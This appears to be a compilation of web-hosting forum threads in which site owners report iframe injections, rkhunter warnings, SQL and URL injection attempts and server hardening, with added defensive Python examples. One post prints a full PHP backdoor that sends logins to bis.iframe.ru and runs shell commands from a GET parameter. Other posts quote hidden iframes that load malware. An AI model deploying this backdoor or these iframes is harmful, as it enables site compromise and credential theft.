Iframe Injection And Rkhunter Warnings

Aug 25, 2007

I have a major problem with iframes being injected into every file (header.php, footer.php, index.php, login.php and vars.php) on all server accounts.

Code:
<iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe>
What is the reason and how do I fix that?


And my second problem is the rkhunter warnings; I am not sure if they are related to the first problem:
rkhunter results:

Code:
Checking system commands...

Performing 'strings' command checks
Checking 'strings' command [ OK ]

Performing 'shared libraries' checks
Checking for preloading variables [ None found ]
Checking for preload file [ Not found ]
Checking LD_LIBRARY_PATH variable [ Not found ]

Performing file properties checks
Checking for prerequisites [ Warning ]
/bin/awk [ OK ]
/bin/basename [ OK ]
/bin/bash [ OK ]
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/cp [ OK ]
/bin/csh [ OK ]
/bin/cut [ OK ]
/bin/date [ OK ]
/bin/df [ OK ]
/bin/dmesg [ OK ]
/bin/echo [ OK ]
/bin/ed [ OK ]
/bin/egrep [ OK ]
/bin/env [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/kill [ OK ]
/bin/login [ OK ]
/bin/ls [ OK ]
/bin/mail [ OK ]
/bin/mktemp [ OK ]
/bin/more [ OK ]
/bin/mount [ OK ]
/bin/mv [ OK ]
/bin/netstat [ OK ]
/bin/passwd [ OK ]
/bin/ps [ OK ]
/bin/pwd [ OK ]
/bin/rpm [ OK ]
/bin/sed [ OK ]
/bin/sh [ OK ]
/bin/sort [ OK ]
/bin/su [ OK ]
/bin/touch [ OK ]
/bin/uname [ OK ]
/bin/gawk [ OK ]
/bin/tcsh [ OK ]
/usr/bin/awk [ OK ]
/usr/bin/chattr [ OK ]
/usr/bin/curl [ OK ]
/usr/bin/cut [ OK ]
/usr/bin/diff [ OK ]
/usr/bin/dirname [ OK ]
/usr/bin/du [ OK ]
/usr/bin/env [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/GET [ Warning ]
/usr/bin/groups [ Warning ]
/usr/bin/head [ OK ]
/usr/bin/id [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/last [ OK ]
/usr/bin/lastlog [ OK ]
/usr/bin/ldd [ Warning ]
/usr/bin/less [ OK ]
/usr/bin/locate [ OK ]
/usr/bin/logger [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/lynx [ OK ]
/usr/bin/md5sum [ OK ]
/usr/bin/newgrp [ OK ]
/usr/bin/passwd [ OK ]
/usr/bin/perl [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/readlink [ OK ]
/usr/bin/runcon [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/size [ OK ]
/usr/bin/slocate [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/strace [ OK ]
/usr/bin/strings [ OK ]
/usr/bin/sudo [ OK ]
/usr/bin/tail [ OK ]
/usr/bin/test [ OK ]
/usr/bin/top [ OK ]
/usr/bin/tr [ OK ]
/usr/bin/uniq [ OK ]
/usr/bin/users [ OK ]
/usr/bin/vmstat [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/wc [ OK ]
/usr/bin/wget [ OK ]
/usr/bin/whatis [ Warning ]
/usr/bin/whereis [ OK ]
/usr/bin/which [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
/usr/bin/gawk [ OK ]
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ OK ]
/sbin/ifdown [ Warning ]
/sbin/ifup [ Warning ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/ip [ OK ]
/sbin/lsmod [ OK ]
/sbin/modinfo [ OK ]
/sbin/modprobe [ OK ]
/sbin/nologin [ OK ]
/sbin/rmmod [ OK ]
/sbin/runlevel [ OK ]
/sbin/sulogin [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/usr/sbin/adduser [ OK ]
/usr/sbin/chroot [ OK ]
/usr/sbin/groupadd [ OK ]
/usr/sbin/groupdel [ OK ]
/usr/sbin/groupmod [ OK ]
/usr/sbin/grpck [ OK ]
/usr/sbin/kudzu [ OK ]
/usr/sbin/lsof [ OK ]
/usr/sbin/prelink [ OK ]
/usr/sbin/pwck [ OK ]
/usr/sbin/tcpd [ OK ]
/usr/sbin/useradd [ OK ]
/usr/sbin/userdel [ OK ]
/usr/sbin/usermod [ OK ]
/usr/sbin/vipw [ OK ]
/usr/sbin/xinetd [ OK ]
/usr/local/bin/perl [ OK ]
/usr/local/bin/rkhunter [ OK ]

Checking for rootkits...

Performing check of known rootkit files and directories
55808 Trojan - Variant A [ Not found ]
ADM Worm [ Not found ]
AjaKit Rootkit [ Not found ]
aPa Kit [ Not found ]
Apache Worm [ Not found ]
Ambient (ark) Rootkit [ Not found ]
Balaur Rootkit [ Not found ]
BeastKit Rootkit [ Not found ]
beX2 Rootkit [ Not found ]
BOBKit Rootkit [ Not found ]
CiNIK Worm (Slapper.B variant) [ Not found ]
Danny-Boy's Abuse Kit [ Not found ]
Devil RootKit [ Not found ]
Dica-Kit Rootkit [ Not found ]
Dreams Rootkit [ Not found ]
Duarawkz Rootkit [ Not found ]
Enye LKM [ Not found ]
Flea Linux Rootkit [ Not found ]
FreeBSD Rootkit [ Not found ]
****`it Rootkit [ Not found ]
GasKit Rootkit [ Not found ]
Heroin LKM [ Not found ]
HjC Kit [ Not found ]
ignoKit Rootkit [ Not found ]
ImperalsS-FBRK Rootkit [ Not found ]
Irix Rootkit [ Not found ]
Kitko Rootkit [ Not found ]
Knark Rootkit [ Not found ]
Li0n Worm [ Not found ]
Lockit / LJK2 Rootkit [ Not found ]
Mood-NT Rootkit [ Not found ]
MRK Rootkit [ Not found ]
Ni0 Rootkit [ Not found ]
Ohhara Rootkit [ Not found ]
Optic Kit (Tux) Worm [ Not found ]
Oz Rootkit [ Not found ]
Phalanx Rootkit [ Not found ]
Phalanx Rootkit (strings) [ Not found ]
Portacelo Rootkit [ Not found ]
R3dstorm Toolkit [ Not found ]
RH-Sharpe's Rootkit [ Not found ]
RSHA's Rootkit [ Not found ]
Scalper Worm [ Not found ]
Sebek LKM [ Not found ]
Shutdown Rootkit [ Not found ]
SHV4 Rootkit [ Not found ]
SHV5 Rootkit [ Not found ]
Sin Rootkit [ Not found ]
Slapper Worm [ Not found ]
Sneakin Rootkit [ Not found ]
Suckit Rootkit [ Not found ]
SunOS Rootkit [ Not found ]
SunOS / NSDAP Rootkit [ Not found ]
Superkit Rootkit [ Not found ]
TBD (Telnet BackDoor) [ Not found ]
TeLeKiT Rootkit [ Not found ]
T0rn Rootkit [ Not found ]
Trojanit Kit [ Not found ]
Tuxtendo Rootkit [ Not found ]
URK Rootkit [ Not found ]
VcKit Rootkit [ Not found ]
Volc Rootkit [ Not found ]
X-Org SunOS Rootkit [ Not found ]
zaRwT.KiT Rootkit [ Not found ]

Performing additional rootkit checks
Suckit Rookit additional checks [ OK ]
Checking for possible rootkit files and directories [ None found ]
Checking for possible rootkit strings [ None found ]

Performing malware checks
Checking running processes for suspicious files [ None found ]
Checking for login backdoors [ None found ]
Checking for suspicious directories [ None found ]
Checking for sniffer log files [ None found ]

Performing trojan specific checks
Checking for enabled xinetd services [ None found ]
Checking for Apache backdoor [ Not found ]

Performing Linux specific checks
Checking kernel module commands [ OK ]
Checking kernel module names [ OK ]
Checking the network...

Performing check for backdoor ports
Checking for UDP port 2001 [ Not found ]
Checking for TCP port 2006 [ Not found ]
Checking for TCP port 2128 [ Not found ]
Checking for TCP port 14856 [ Not found ]
Checking for TCP port 47107 [ Not found ]
Checking for TCP port 60922 [ Not found ]

Performing checks on the network interfaces
Checking for promiscuous interfaces [ None found ]

Checking the local host...

Performing system boot checks
Checking for local host name [ Found ]
Checking for local startup files [ Found ]
Checking local startup files for malware [ None found ]
Checking system startup files for malware [ None found ]

Performing group and account checks
Checking for passwd file [ Found ]
Checking for root equivalent (UID 0) accounts [ None found ]
Checking for passwordless accounts [ None found ]
Checking for passwd file changes [ None found ]
Checking for group file changes [ None found ]
Checking root account shell history files [ OK ]

Performing system configuration file checks
Checking for SSH configuration file [ Found ]
Checking if SSH root access is allowed [ Warning ]
Checking if SSH protocol v1 is allowed [ Warning ]
Checking for running syslog daemon [ Found ]
Checking for syslog configuration file [ Found ]
Checking if syslog remote logging is allowed [ Not allowed ]

Performing filesystem checks
Checking /dev for suspicious file types [ None found ]
Checking for hidden files and directories [ Warning ]
Checking application versions...

Checking version of Exim MTA [ OK ]
Checking version of GnuPG [ Warning ]
Checking version of Apache [ Skipped ]
Checking version of Bind DNS [ OK ]
Checking version of OpenSSL [ Warning ]
Checking version of PHP [ OK ]
Checking version of Procmail MTA [ OK ]
Checking version of OpenSSH [ OK ]

System checks summary
=====================

File properties checks...
Required commands check failed
Files checked: 129
Suspect files: 6

Rootkit checks...
Rootkits checked : 114
Possible rootkits: 0

Applications checks...
Applications checked: 8
Suspect applications: 2

The system checks took: 3 minutes and 12 seconds

All results have been written to the logfile (/var/log/rkhunter.log)

One or more warnings have been found while checking the system.

Please check the log file (/var/log/rkhunter.log)


Rkhunter 1.3.0 Warnings

Oct 5, 2007

I was testing the new RKHunter 1.3.0, and found a few warnings:

Code:
/usr/bin/GET [ Warning ]
/usr/bin/groups [ Warning ]
/usr/bin/ldd [ Warning ]
/usr/bin/whatis [ Warning ]
/sbin/ifdown [ Warning ]
/sbin/ifup [ Warning ]
Investigating the logs found this:

Code:
Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Same result on two different RHE 4 boxes... Just to verify that this is a false positive, do you have the same results on your RHE 4 boxes while running "rkhunter -c"?


Iframe Injection

Jul 22, 2009

Yesterday it was discovered that a website had most or all of the html pages compromised with some sort of iframe injection. Every page had an iframe line added to the bottom that attempted to load something from another website. It was coming from a domain called reycross.net and was attempting to load the html/framer virus into the visitor's computer.

The problem is that I cannot identify how the injection hit the system. Here are the facts I can provide...

1. The server does NOT have Joomla or Wordpress.

2. The injection seemed to hit every html page whether the page was active on the site or not.

3. The injection hit only one account.

I have checked /var/log/messages and /var/log/secure and find nothing.

What I don't have is proper ftp logging to determine whether the injection came from that method.

Additional notes: Shortly before the injection took place the box was updated to the latest version of cpanel. Also php was upgraded to 5.2.10. At the time suPHP was enabled but unfortunately had to be disabled because it created problems with another site. Prior to this suPHP was disabled as well.

I went through and removed all instances of this iframe injection and ran another update of cpanel. I also recompiled apache/php and went back to 5.2.8 in case the problem was php related.


Iframe Injection

Jun 9, 2007

One of my site's index pages is having iframe injections. I am not sure about the reason. The page is chmod 644, and in php.ini dl() is even disabled.

But still someone is somehow able to inject an iframe that redirects the page to some other URL.

Any suggestions how to fix that? Any mod_rewrite rule or anything for this?


BEWARE - Sudden Iframe Injection Attacks, Catastrophic Results

Sep 4, 2007

All my sites on both my hosting accounts are infected with an iframe.

At the end of the index.html files the malicious code just appeared...suddenly 3 weeks ago.

The host blamed Joomla so I took the appropriate steps:

Upgraded my Joomla to the latest version, changed the whole account username and password, changed the configuration and template to unwritable.

It stopped the injection for a few days but then it came back.
I would also like to add that 2 other sites on my account, one simple index.html file and an old website I have that is totally HTML with nothing to do with Joomla also got infected.

The iframe also infected a Drupal install I did as a test.

So according to these facts, is this a hosting company not taking responsibility, or can an infected Joomla site spread to other normal HTML sites and different CMSs on the server?

This situation is ruining me and I strongly suspect it's a hosting problem and not Joomla.

Any expert opinions from true professionals would be appreciated because if I can prove that it's not a Joomla issue I might take legal action against the hosting company since this has cost me dozens of hours of work and several hundred dollars of lost revenue.

I am attaching the iframe exploit. It installs itself on every index file... in every folder - components, mambots, etc. Additionally it attaches itself to any and every kind of addon that has an index.html file.


Hivelocity Warnings

Oct 15, 2009

If any of you are with or going with Hivelocity here are a few things we have encountered today:

We asked to cancel our Virtuozzo license at the end of this billing month, which would be the 22nd; they then went ahead and cancelled it straight away, meaning we had no backups for our VPS clients.

We then asked them to install Windows 2008 Server onto our machine; it took them from 12pm to 9pm to complete this.

After logging in to our billing system we find a new hard drive added to our server which, one, we did not ask for and, two, we do not need, adding an extra $150 onto our server bill.

Overall today has been a real pain in the **** with them, yes I agree they are a fantastic host but the fact we have been billed for something we never asked for has completely annoyed me.


Post Your CSF Score & Warnings

May 26, 2007

We were able to get the score up to 62/70. Will need the server management company's advice and help to try and get rid of more of the red warnings.

What is your score and which red warnings do you have left? Post them please.

Score: 62/70.

Will ask server management company about these red warnings:
A1. /dev/shm isn't mounted with the noexec,nosuid options (currently: none). You should consider adding a mountpoint into /etc/fstab for /dev/shm with those options
A2. You should install the mod_evasive apache module from source to help prevent DOS attacks against apache. Note that this module breaks FrontPage functionality
A3. You should modify /usr/local/lib/php.ini and set:
enable_dl = off
This prevents users from loading php modules that affect everyone on the server. Note that if use dynamic libraries, such as ioncube, you will have to load them directly in php.ini
A4. On most servers anacron isn't needed and should be stopped:
service anacron stop
chkconfig anacron off
chkconfig --del anacron

Probably going to leave these red warnings for now:
B1. For ultimate SSH security, you might want to consider disabling PasswordAuthentication and only allow access using PubkeyAuthentication. For more information read this article and this article
B2. You should modify /usr/local/lib/php.ini and disable commonly abused php functions, e.g.:
disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
Some client web scripts may break with some of these functions disabled, so you may have to remove them from this list
B3. To reduce the risk of hackers accessing all sites on the server from a compromised PHP web script, you should enable phpsuexec when you build apache/php. Note that there are sideeffects when enabling phpsuexec on a server and you should be aware of these before enabling it
B4. You have package updating disabled, this can pose a security risk as OS vendor and cPanel security updates may not be applied in a timely manner WHM > Update Config >cPanel Package Updates > Automatic

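An added example (not CSF's own code) that checks three of the report items above from configuration text: item A1 (/dev/shm mount options in /etc/fstab), A3 (enable_dl in php.ini) and B2 (disable_functions). WEAK_* and FIXED_* are constructed fragments showing the flagged setting beside the corrected one.

```python
"""Check the /dev/shm and php.ini items from the CSF report above.

Added example, not CSF's own code: given the text of /etc/fstab and php.ini it
reports which of items A1, A3 and B2 still fail; WEAK_* and FIXED_* are constructed
fragments showing the flagged setting beside the corrected one.
"""
import re

REQUIRED_SHM_OPTS = {"noexec", "nosuid"}
ABUSED_FUNCTIONS = {"show_source", "system", "shell_exec", "passthru",
                    "exec", "phpinfo", "popen", "proc_open"}


def shm_mount_options(fstab_text):
    """Mount options of the /dev/shm entry, or None when fstab has no such entry."""
    for line in fstab_text.splitlines():
        fields = line.split("#", 1)[0].split()
        if len(fields) >= 4 and fields[1] == "/dev/shm":
            return set(fields[3].split(","))
    return None


def php_ini_value(ini_text, key):
    """Value of an uncommented 'key = value' directive; the last occurrence wins, as in PHP."""
    rx = re.compile(r"^[ \t]*" + re.escape(key) + r"[ \t]*=[ \t]*(.*?)[ \t]*$", re.MULTILINE)
    matches = rx.findall(ini_text)
    return matches[-1].strip('"') if matches else None


def audit(fstab_text, ini_text):
    """{item: [problems]}; an empty list means that report item passes."""
    problems = {"A1": [], "A3": [], "B2": []}
    opts = shm_mount_options(fstab_text)
    if opts is None:
        problems["A1"].append("no /dev/shm entry in fstab")
    elif REQUIRED_SHM_OPTS - opts:
        problems["A1"].append("missing " + ",".join(sorted(REQUIRED_SHM_OPTS - opts)))
    enable_dl = php_ini_value(ini_text, "enable_dl")
    if enable_dl is None or enable_dl.lower() not in ("off", "0", "false"):
        problems["A3"].append("enable_dl is %r, expected Off" % enable_dl)
    disabled = {f.strip() for f in (php_ini_value(ini_text, "disable_functions") or "").split(",")}
    still_on = ABUSED_FUNCTIONS - disabled
    if still_on:
        problems["B2"].append("still callable: " + ", ".join(sorted(still_on)))
    return problems


# Constructed fragments: the state the report complains about, then the corrected one.
WEAK_FSTAB = "tmpfs /dev/shm tmpfs defaults 0 0\n"
FIXED_FSTAB = "tmpfs /dev/shm tmpfs defaults,noexec,nosuid 0 0\n"
WEAK_INI = "enable_dl = On\n; disable_functions =\n"
FIXED_INI = ("enable_dl = Off\n"
             "disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open\n")
```

As the report's own note says, disabling these functions can break client scripts, so run audit() against the live files and trim the list before deploying it.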

Apache :: Periodic Request Timed-out Warnings

Sep 21, 2013

So I've set everything up manually a few times before now, but I got so bored of configuring everything for a manual install I just said screw it and used XAMPP this time - so my circumstances are not completely ideal.

Basically what I am looking to find out is how to improve loading speeds for Apache, PHP and MySQL on my dedi server?

The server I have is of the following spec:
Intel Xeon CPU E5-1650 V2 (3.50Ghz with 12 cores total)
64 GB DDR3 ECC
2 x 2TB SATA3 (RAID 0/1)

I use Windows Web 2008 R2, so only 32GB of the RAM is usable.

With all the above aside, here is the important part: whilst people are browsing the websites I have configured, they are randomly hit with a blank white page saying "Your request has timed out. Please retry the request." - I have about 100 unique hits daily and a lot of people report the same problem, and I have even had it myself.

It feels as if the server has much more power than Apache and co. is trying to utilize - what can I do?


Sql Injection

Jul 8, 2009

I had a non-client send me an email about being hacked. Apparently the hacker is using a program/command line and is entering this into the db:

user=' &pass1=111-222-1933email@adress.tst&pass2=test&submit=
create%20Account

Any way he can patch up his Navicat database to stop this?


URL Injection

Aug 17, 2007

I've experienced so many hacker attacks lately. Hosted with hostforweb.com, if that makes any difference.

The last issue I have is:
Type of attack: URL Injection -- attempt to inject / load files onto the
server via PHP/CGI vulnerabilities

How can I secure my server against such attacks?

Also I need to resolve this issue ASAP but can not find the file and I don't know what to do.

Report:

Sample log report including date and time stamp:

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:03
-0500] GET
/awstats/data/awstats1...marythecelticlady.com.txt/admin/index.php?o=[url]HTTP/1.1 302 228 - libwww-perl/5.808 - -

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET /admin/index.php?o=[url]HTTP/1.1
302 228 - libwww-perl/5.808 - -

Request: rosemarythecelticlady.com 64.202.102.218 - - [13/Aug/2007:11:50:04
-0500] GET
/awstats/data/admin/index.php?o=[url]
HTTP/1.1 302 228 - libwww-perl/5.808 - -

WHAT NEEDS TO BE DONE HERE, and where do I locate it? Your help is greatly appreciated.


Plesk 11.x / Windows :: Local Backup Completed With Warnings

Nov 19, 2014

Operating System: Windows Server 2008 R2 Std
Plesk: Parallels Plesk Panel 11.5

We have scheduled a server local backup via Backup Manager and found that the backup completed with warnings.

We have checked the log at: E:\Program Files (x86)\Parallels\Plesk\PMM\sessions\2014-11-18-144536.191\psadump.log

8052: Warning 18/11/2014 18:18:55.028 : Exception ignored ( System.ComponentModel.Win32Exception: The system cannot find the file specified at psabackupcommon.FileUtils.DeleteFile(String fileName) at psadumpagent.ArchiveNode.doStdClose() )
8052: Debug 18/11/2014 18:18:55.028 : Add mail name 'abc@xxxx.com' directory 'F:Plesk PrivateTemp21282721-4181-4c0f-9520-c232f00b7668MailMigratorabc@xxxx.com to dump

[Code] .....


PhpMyAdmin SQL Injection

Dec 13, 2008

Anyone using phpMyAdmin for MySQL admin, you need to know about a newly discovered attack vector.

Here's the official announcement: [url]

The key to this is in their description, "A logged-in user can be subject of SQL injection through cross site request forgery. Several scripts in phpMyAdmin are vulnerable and the attack can be made through table parameter."

A logged in user... This attack is a combination of SQL injection through CSRF. In other words, you'd have to be logged into your phpMyAdmin program, hit a website set up for CSRF, and then the attacker could have access to your phpMyAdmin as you.

If there's interest here, I could write up a detailed description of CSRF and how to prevent this type of attack.

Just let me know...

You should upgrade immediately to either phpMyAdmin 2.9.11.4 or 3.1.1.0 or apply patch 12100.


Plesk 12.x / Linux :: Servershield Errors And Warnings In Daily Cron

Nov 19, 2014

I get these emails every day, sometimes fewer warnings, but today there are plenty again:

Subject: Cron <root@plesk01> /opt/psa/admin/bin/php -c '/opt/psa/admin/conf/php.ini' -dauto_prepend_file=sdk.php '/opt/psa/admin/plib/modules/servershield/scripts/aggregate-stats.php'

Code:

PHP Notice: Undefined property: stdClass::$response; File: /opt/psa/admin/plib/modules/servershield/scripts/aggregate-stats.php, Line: 21

PHP Notice: Trying to get property of non-object; File: /opt/psa/admin/plib/modules/servershield/scripts/aggregate-stats.php, Line: 21

[Code] .....

They started showing up when I upgraded to Plesk 12 and activated the server shield extension. The server is an Ubuntu 12.04 LTS.


Reverse Proxy And SQL Injection

Jun 30, 2009

Does deploying a reverse proxy in front of the web/db server reduce the threat of SQL injection?

Emphasis on 'reduce' the threat - or does it provide no help at all?


Php Injection & Session Hacking

May 28, 2008

I had done a program in early 2006 for a site in PHP-MySQL. At the time of doing the code, the code written was not so standard and it contained uninitialized variables used for include file paths (even though values are assigned to them before using) and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.

And now I was informed that the insecure code in my program caused the server crash and I have to pay the penalty for the same. Can anyone let me know whether the below code / keeping the session variables within a folder inside /www/ will make the sites hosted on the server where this program runs stop/crash forever?

------------------------------------------------------------------
function update_region($id,$regname,$regcom)
{
    // $regname, $regcom and $id go into the SQL text by string concatenation, unescaped
    $query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."',
    region_comments = '". $regcom."' WHERE region_id =" .$id;
    mysql_query($query);

......
-------------------------------------------------------------------

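An added example, not the poster's code, that puts the update_region() construction above beside a parameterised version. Python's standard sqlite3 module stands in for PHP's mysql_query() so it runs offline; the UPDATE has the same shape as the one in the post, and the two constructed rows are assumptions.

```python
"""The update_region() pattern: string-built SQL beside bound parameters.

Added example, not the poster's code: Python's sqlite3 stands in for PHP's
mysql_query() so it runs offline; the UPDATE has the same shape as the one in the post.
"""
import sqlite3


def make_db():
    """In-memory copy of taxregion_mast with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE taxregion_mast (region_id INTEGER PRIMARY KEY, "
                 "taxregion_name TEXT, region_comments TEXT)")
    conn.executemany("INSERT INTO taxregion_mast VALUES (?, ?, ?)",
                     [(1, "North", "n"), (2, "South", "s")])
    conn.commit()
    return conn


def update_region_unsafe(conn, region_id, regname, regcom):
    """Same construction as the post: all three values concatenated into the SQL text."""
    query = ("UPDATE taxregion_mast SET taxregion_name = '" + regname + "', "
             "region_comments = '" + regcom + "' WHERE region_id = " + str(region_id))
    cur = conn.execute(query)
    conn.commit()
    return cur.rowcount


def update_region_safe(conn, region_id, regname, regcom):
    """Values travel as bound parameters, so they can never become SQL syntax."""
    region_id = int(region_id)  # ValueError for anything that is not a whole number
    cur = conn.execute(
        "UPDATE taxregion_mast SET taxregion_name = ?, region_comments = ? WHERE region_id = ?",
        (regname, regcom, region_id))
    conn.commit()
    return cur.rowcount


def region_name(conn, region_id):
    """Current taxregion_name of one row."""
    return conn.execute("SELECT taxregion_name FROM taxregion_mast WHERE region_id = ?",
                        (region_id,)).fetchone()[0]


def demo():
    """Observations for the cases that distinguish the two versions."""
    out = {}
    # 1. An ordinary apostrophe in a name turns the concatenated text into invalid SQL.
    conn = make_db()
    try:
        update_region_unsafe(conn, 1, "O'Brien", "ok")
        out["unsafe_apostrophe"] = "updated"
    except sqlite3.OperationalError as err:
        out["unsafe_apostrophe"] = "error: " + str(err)
    # 2. The bound version stores the same name as-is.
    out["safe_apostrophe_rows"] = update_region_safe(conn, 1, "O'Brien", "ok")
    out["safe_apostrophe_name"] = region_name(conn, 1)
    # 3. $id is concatenated unquoted, so a non-numeric id rewrites the WHERE clause and
    #    the update reaches every row; the bound version rejects such a value instead.
    out["unsafe_id_rows"] = update_region_unsafe(make_db(), "1 OR 1=1", "x", "y")
    try:
        update_region_safe(make_db(), "1 OR 1=1", "x", "y")
        out["safe_id"] = "updated"
    except ValueError:
        out["safe_id"] = "rejected"
    return out
```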

Prevention LFI And SQL Injection Attacks

May 12, 2008

I am seeing a lot of local file inclusion (LFI) and MySQL injection attacks quite often directed at PHP scripts.

What is the way to prevent them? Would installing mod_security into Apache work?


Rkhunter

Oct 25, 2009

Since my CentOS updated from 5.3 to 5.4 I am getting this "error" with rkhunter.

Warning: Possible promiscuous interfaces:
'ifconfig' command output: UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
'ip' command output: eth1
'ip' command output: eth0

I already ran:
rkhunter --propupd


Rkhunter Log

Sep 27, 2007

About my rkhunter's log: it gives some warnings but I don't know if they are really important ones.

Here are the warnings it gives :

Warning: The command '/usr/bin/GET' has been replaced by a script: /usr/bin/GET: perl script text executable
Warning: The command '/usr/bin/groups' has been replaced by a script: /usr/bin/groups: Bourne shell script text executable
Warning: The command '/usr/bin/ldd' has been replaced by a script: /usr/bin/ldd: Bourne shell script text executable
Warning: The command '/usr/bin/whatis' has been replaced by a script: /usr/bin/whatis: Bourne shell script text executable
Warning: The command '/sbin/ifdown' has been replaced by a script: /sbin/ifdown: Bourne-Again shell script text executable
Warning: The command '/sbin/ifup' has been replaced by a script: /sbin/ifup: Bourne-Again shell script text executable
Warning: Found enabled xinetd service: /etc/xinetd.d/ftp_psa
Warning: Found enabled xinetd service: /etc/xinetd.d/poppassd_psa
Warning: Found enabled xinetd service: /etc/xinetd.d/smtp_psa
Warning: Found enabled xinetd service: /etc/xinetd.d/smtps_psa
Warning: The SSH configuration option 'PermitRootLogin' has not been set.
The default value may be 'yes', to allow root access.
Warning: Hidden file found: /usr/share/man/man1/..1.gz: gzip compressed data, from Unix, max compression
Warning: Application 'gpg', version '1.2.6', is out of date, and possibly a security risk.
Warning: Application 'openssl', version '0.9.7a', is out of date, and possibly a security risk.
Warning: Application 'php', version '4.3.9', is out of date, and possibly a security risk.

I am using Plesk and I am using yum update for updating files and scripts. So I don't know how I can update gpg, php and openssl. Plus, for some time it said that port 2006 is open and a possible trojan backdoor. But when I check now it doesn't give any error like that.

Is there any major problem in those logs or not?

If someone wants, I can also attach the full rkhunter.log or only the warning output of rkhunter.log.


Hidden Iframe Or Something

May 1, 2009

So when I look at my source code, I see this all the way at the bottom:

<iframe src="http://viewhit.biz" scrolling="no" frameborder="0" height="1" width="1"></iframe>

But I never added that... and when I look at my footer file (which I include at the bottom of all my other files), it's not there, even when I transfer the current one from my server, so it's definitely not in that file.

Any idea how else that could have been added, and how I can take it off? My site's also been acting kind of weird lately, scrolling all the way to the bottom any time a page loads, which is really annoying.


Iframe And Micfo

Mar 11, 2008

For the second time in the last 2 months I got an iframe (leohin.com) added to a php script and index.html pages.

My site is hosted on Micfo (support has disappeared recently. My last 3 tickets were unanswered).

I have some newbie questions regarding those iframe injections.

How do they add these?

Did they hack the host or only my website ?

Anyone hosted on Micfo also got those leohin.com iframes ?

Anyway I'm really disappointed by the lack of support by Micfo.

I'm certainly moving soon.


Attack Using Iframe

Dec 16, 2008

I am experiencing a problem, which I think is a DDoS attack.

Well, what's happening is that my blog is receiving many requests to do so, asking you to download the file xmlrpc.php (part of WordPress). I have tried to block this URL that does the iframe to receive such visits to my blog, but did not succeed.

No longer trying to block with .htaccess etc.; nothing else's right!


Iframe Js Attack

Apr 19, 2008

It seems that one domain on a cPanel server has been injected with some iframe code... The problem seems to be that we cannot find the iframe code anywhere in the public_html directory.

We already scanned the site's public_html directory trying to find the JS file or something that can launch the iframe, but it seems to be impossible to find; we also ran clamscan in the folder without success.

I was thinking about some mod_security rule to block iframe js attacks, does anybody know about this?

This is a RHE 4 + cPanel server. This is the iframe code:

iframe width=1 height=1 src=[url]


Hacked From Bis.iframe.ru

Jun 22, 2007

Today all the sites with nobody:nobody files got hacked; every file was replaced with

Code:
<?php
error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
and .htaccess files. We have decoded it; the URLs are:

htmltags.ru
mshtml.ru
iframe.ru

We know that we should use suEXEC to stop the nobody files problem, but now we would like help to find where they got access. I have googled and found this post, but without a solution:

[url]


<iframe> Worms

Jul 13, 2007

I have recently found that several of the web sites that I'm hosting on my server have worms: when you access the web sites in Internet Explorer, the antivirus is triggered. When you look at the source code there's always an iframe that loads a remote web page with a worm. Have you seen it already? How did these web sites get infected? Is there an easy way to clean them or is it the hard way? I ran a clamscan on the server and it didn't find anything.

